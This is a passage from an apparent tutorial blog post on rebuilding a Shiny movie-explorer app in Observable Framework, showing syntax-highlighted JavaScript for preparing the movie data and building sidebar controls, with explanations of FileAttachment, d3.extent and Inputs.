&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// they get drawn last in our scatter plot and thus appear on top
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;movies.sort((a, b) =&amp;gt; a.Oscars &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; b.Oscars);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// Modify/extend our data objects for easier future use
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;movies.forEach(&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(d) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Add a Boolean stating whether or not the movie won any Oscars
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; d.OscarWinner &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; d.Oscars &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Convert the release date string to a JS Date object
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; d.Released &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;new&lt;/span&gt; Date(d.Released);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Add a property that is just the four-digit year of release
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; d.YearReleased &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; d.Released.getFullYear();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Add an array of Genres and remove any excess whitespace
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; d.Genres &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; d.Genre&lt;span style="color:#ff7b72;font-weight:bold"&gt;?&lt;/span&gt;.split(&lt;span style="color:#a5d6ff"&gt;&amp;#39;,&amp;#39;&lt;/span&gt;).map(s =&amp;gt; s.trim()) &lt;span style="color:#ff7b72;font-weight:bold"&gt;||&lt;/span&gt; [];
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Convert the Director string to lowercase for simpler searching
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; d.Director &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; d.Director&lt;span style="color:#ff7b72;font-weight:bold"&gt;?&lt;/span&gt;.toLowerCase() &lt;span style="color:#ff7b72;font-weight:bold"&gt;||&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Convert the Cast string to lowercase for simpler searching
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; d.Cast &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; d.Cast&lt;span style="color:#ff7b72;font-weight:bold"&gt;?&lt;/span&gt;.toLowerCase() &lt;span style="color:#ff7b72;font-weight:bold"&gt;||&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Turn the BoxOffice revenue figures into millions of dollars
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; d.BoxOffice &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; (d.BoxOffice &lt;span style="color:#ff7b72;font-weight:bold"&gt;||&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1e6&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;});
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// Create an array containing all the different genres found in the
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// dataset and sort alphabetically
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; genres &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Array.from(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; movies.reduce(&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(set, d) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; d.Genres.forEach(g =&amp;gt; set.add(g));
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; set;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }, &lt;span style="color:#ff7b72"&gt;new&lt;/span&gt; Set())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;.sort((a, b) =&amp;gt; a.localeCompare(b));
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// Extract a two-element array giving the earliest and latest
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// release years of films in the dataset
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; yearExtent &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; d3.extent(movies, d =&amp;gt; d.YearReleased);
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;Most of this is &amp;ldquo;vanilla&amp;rdquo; JavaScript but there are a couple of functions that aren&amp;rsquo;t: &lt;code&gt;FileAttachment&lt;/code&gt; and &lt;code&gt;d3.extent&lt;/code&gt;. &lt;a href="https://observablehq.com/documentation/data/files/file-attachments" rel="external"&gt;&lt;code&gt;FileAttachment&lt;/code&gt;&lt;/a&gt; is a function created specifically for Observable notebooks that also works with Observable Framework. It simplifies the code required to load data files like JSON, CSV and XLSX. It doesn&amp;rsquo;t need to be explicitly &lt;code&gt;import&lt;/code&gt;ed into a Framework markdown file. The same is true of &lt;a href="https://d3js.org/d3-array/summarize#extent" rel="external"&gt;&lt;code&gt;d3.extent&lt;/code&gt;&lt;/a&gt; (and all other methods of the d3 library). This method takes an input array of data and an &amp;ldquo;accessor function&amp;rdquo; that is applied to each element of the array. The return value is then a two-element array of the minimum and maximum values returned when the accessor function is applied to each element of the input array.&lt;/p&gt;
&lt;aside&gt;
&lt;p&gt;&lt;code&gt;d3.extent&lt;/code&gt; is used to find what I was taught at school was the two values used to calculate the &amp;ldquo;range&amp;rdquo; of a one-dimensional dataset. Confusingly, d3 also has a &lt;a href="https://observablehq.com/@d3/d3-range" rel="external"&gt;&lt;code&gt;range&lt;/code&gt; method&lt;/a&gt; that does something entirely different - it creates a sequence. This is particularly confusing if you use d3&amp;rsquo;s &lt;a href="https://observablehq.com/@d3/d3-scalelinear" rel="external"&gt;&lt;code&gt;scaleLinear&lt;/code&gt;&lt;/a&gt; method that returns a function with its own &lt;code&gt;range&lt;/code&gt; method.&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;The second JavaScript cell creates some, not especially interesting, utility functions and an object that are used later on in the construction of the controls and graphics. This is all vanilla JavaScript.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// Create function for defining a middle grey of varying opacity
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; gy &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;150&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; getGrey &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; opacity =&amp;gt; &lt;span style="color:#a5d6ff"&gt;`rgba(&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;${&lt;/span&gt;gy&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;,&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;${&lt;/span&gt;gy&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;,&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;${&lt;/span&gt;gy&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;,&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;${&lt;/span&gt;opacity&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;)`&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// Create function for converting a Boolean value to a text label
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; getWonOscarText &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; bool =&amp;gt; bool &lt;span style="color:#ff7b72;font-weight:bold"&gt;?&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Won Oscar(s)&amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Didn\&amp;#39;t Win an Oscar&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// Create an array of objects that can be used to map between data properties
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// and their more human-friendly labels and vice-versa
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; axisVariables &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {name&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Tomatometer&amp;#39;&lt;/span&gt;, prop&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Meter&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {name&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Numeric Rating&amp;#39;&lt;/span&gt;, prop&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Rating&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {name&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Number of Reviews&amp;#39;&lt;/span&gt;, prop&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Reviews&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {name&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Box-office revenue ($million)&amp;#39;&lt;/span&gt;, prop&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;BoxOffice&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {name&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Year&amp;#39;&lt;/span&gt;, prop&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Released&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {name&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Length (minutes)&amp;#39;&lt;/span&gt;, prop&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Runtime&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;];
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In the third block we finally start to build the user interface, adding all the controls for our sidebar. This is the point where we start utilising the power of Framework through the in-built &lt;code&gt;view&lt;/code&gt; function and &lt;code&gt;Inputs&lt;/code&gt; object.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;In Observable, a view is a user interface element that directly controls a value in the notebook. A view consists of two parts:&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;ul&gt;
&lt;li&gt;The view, which is typically an interactive DOM element […].&lt;/li&gt;
&lt;li&gt;The value, which is any JavaScript value.&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;For the &lt;code&gt;Inputs&lt;/code&gt; methods the first argument typically represents the allowed values for the control and a second argument provides additional details using an object. The declaration order transfers to the order in which the corresponding UI elements appear in the HTML and thus the ordering, top to bottom, in the sidebar panel. We change the order here from the original Shiny example to something that seems a bit more logical. Specifically, the select menus for choosing the two axes are moved from the bottom of the controls to the top.&lt;/p&gt;
&lt;div class="resizable"&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; xVariable &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; view(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Inputs.select(axisVariables, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;X-axis Variable&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; format&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; d =&amp;gt; d.name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; axisVariables.find((d) =&amp;gt; d.prop &lt;span style="color:#ff7b72;font-weight:bold"&gt;===&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Meter&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; yVariable &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; view(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Inputs.select(axisVariables, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Y-axis Variable&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; format&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; d =&amp;gt; d.name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; axisVariables.find((d) =&amp;gt; d.prop &lt;span style="color:#ff7b72;font-weight:bold"&gt;===&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Reviews&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; reviewsMin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; view(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Inputs.range(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; [&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;300&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; { label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Minimum number of reviews on Rotten Tomatoes&amp;#39;&lt;/span&gt;, step&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;80&lt;/span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; yearMin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; view(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Inputs.number(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; yearExtent,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; { label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Earliest release year&amp;#39;&lt;/span&gt;, step&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1970&lt;/span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; yearMax &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; view(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Inputs.number(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; yearExtent,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; { label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Latest release year&amp;#39;&lt;/span&gt;, step&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; yearExtent[&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;] }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; dollarsMin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; view(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Inputs.number(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; [&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;800&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; { label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Minimum box-office revenue ($million)&amp;#39;&lt;/span&gt;, step&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; dollarsMax &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; view(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Inputs.number(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; [&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;800&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; { label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Maximum box-office revenue ($million)&amp;#39;&lt;/span&gt;, step&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;800&lt;/span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; oscarsMin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; view(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Inputs.radio(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; [&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; { label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Minimum number of Oscars won&amp;#39;&lt;/span&gt;, value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
